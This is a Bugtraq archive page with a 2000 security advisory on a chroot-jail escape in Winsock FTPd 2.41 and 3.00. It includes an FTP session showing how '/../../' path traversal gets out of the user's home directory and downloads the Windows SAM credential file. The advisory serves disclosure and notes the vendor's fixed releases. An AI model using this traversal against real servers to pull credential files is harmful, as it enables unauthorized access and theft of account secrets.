Home page logo

bugtraq logo Bugtraq mailing list archives

Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
From: Interstellar Overdrive <interdrive () HOME COM>
Date: Mon, 27 Nov 2000 17:21:15 +0200

[ Overdrive Advisory # 1 ]

---------------------------[ Synopsis ]

 Subject             :     Vulnerability in Winsock ftpd
 Application     :     Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro,
Winsock FTPd v3.00 Pro
 Platform           :     Win32
 Description     :     a local user can break the chroot jail
 Date                  :     11/28/2000
 Author              :     Interstellar Overdrive
 E-Mail             :     overdrive () workspot net
 WWW               :     http://www.workspot.net/~overdrive/

--------------------------[ Application Info ]

 Winsock FTPd is common popular ftp server for windows95/98/3.11/NT/2K,
Texas Imperial Software it is simple, inexpensive, and easy to set ftp
server for
windows machines, current release is v3.0.
 Homepage : http://www.wftpd.com
 Author  : Alun Jones <alun () texis com>

-------------------------[ Overview ]

 In Winsock ftpd, there is an option called "Restrict to home directory
and below"
where the server makes a chroot jail for the user. lets take an example

c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
257 "/" is current directory     #io's directory here c:\wftpd\io
       #and it is chroot'ed
200 PORT command okay
150 File Listing Follows in ASCII mode.
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
#until now chroot jail working fine...

#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
200 PORT command okay
150 File Listing Follows in ASCII mode.
Program Files
.....etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...

The problem is that the chroot jail only works if the user tried
../../../ not /../../../,
by simply adding a "/" before ../../(which is a common known bug in
win32 applications)
any local user or even anonymous user can change his working directory
to any directory on
the server, having the ability to download any file from the server(as
you saw above).
In other words, the chroot jail is broken.

Vulnerable Winsock FTPd Applications Found :

 Winsock FTPd v2.41 RC14
 Winsock FTPd v2.41 RC14 Pro
 Winsock FTPd v3.00 Pro

-----------------------------[ FIX ]

 Vendor contacted, A new release of Wftpd is out
 which fixes the problem.

 - Wftpd v2.41 RC15
  - Wftpd v3.00 R2

-----------------------------[ Credits ]

 Interstellar Overdrive (interdrive () home com - overdrive () workspot net)

  By Date           By Thread  

Current thread:
  • Vulnerability in Winsock FTPD 2.41/3.00 (Pro) Interstellar Overdrive (Nov 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]